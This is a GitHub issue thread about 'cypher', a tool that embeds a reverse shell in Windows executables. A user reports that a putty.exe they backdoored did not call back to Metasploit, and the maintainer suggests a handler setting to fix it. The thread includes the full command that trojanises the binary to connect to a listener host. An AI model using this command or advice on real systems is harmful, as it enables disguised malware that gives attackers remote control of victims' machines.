### ISSUE TITLE
Payload doesn't triger reverse Metasploit shell under default -d 4 value.

### ISSUE THREAD

**Issue by Hax0rG1rl** [xan7r/cypher#2]
Hi man, 

Got a try to this one and I followed up a testing scenario which was nice detailed here: 
http://hackercool.com/2016/07/windows-hacking-cypher/

Tested target system: W7 64bit. 

As a testing executables I got putty.exe, and then I generated the final payload using this cli:

python addShell.py -f /root/Desktop/putty.exe -t 1 -d 4 -H 192.168.186.128 -P 443 -p 1

I choose -d  4 just to see if the executable is crashing after tampering but everything worked well.

However, using this payload didn't triggered out any reverse connection into Metasploit. 

Do you have any ideas of why is not quite working with that default value of -d 4?

Thanks.

**Comment by xan7r** [comment]
Hi JohnnyAMD,

Thank you for your comment.  Setting the -d (offset) option to 4 shouldn't have any effect on the generated executable because 4 is the default value that will be used if the -d option is not provided.  I just ran the script in my test environment on a Windows7 64bit VM with the command line options you provided and I was able to get a meterpreter session back.

The only thing I can think of is to make sure you set your meterpreter handler payload to windows/meterpreter/reverse_http when using the -p 1 option.  Were you able to get the reverse http meterpreter payload working using other command line options?  If you were, let me know so I can troubleshoot.

**Comment by Hax0rG1rl** [comment]
Right,

Thanks for you input. I wasn't able yet to find a proper value instead of
that -d 4 to use and make the original exec not to crash but this probably
is something which I have to try harder.

Then you can close this issue now and will reopen it is something is
getting wrong from tool's perspective.

Cheers.
On Mon, 11 Jul 2016 at 12:56, xan7r [Masked]
<FWD-737QTYSMENAIYCQANIQDDYDGEA4XAEZAFSIBBYYDHAZXCAIMABWACOYIPMALYZCWMBBQ2O2EHVNYEANZKMIQ2IJNAUGTWSQDMSBSNLYLUIOKIEQ5LHUWFNKTMRQC2Q3PAQ6A24TGIFRCABLCEFQAHQAHKACNAAMQADIALFYU25AD4YBWMAVUEPCEEMBCIE7CAAQAAIA=@
opayq.com> wrote:

**Comment by xan7r** [comment]
Alright, closing at your request.  Let me know if you encounter any issues with the script.
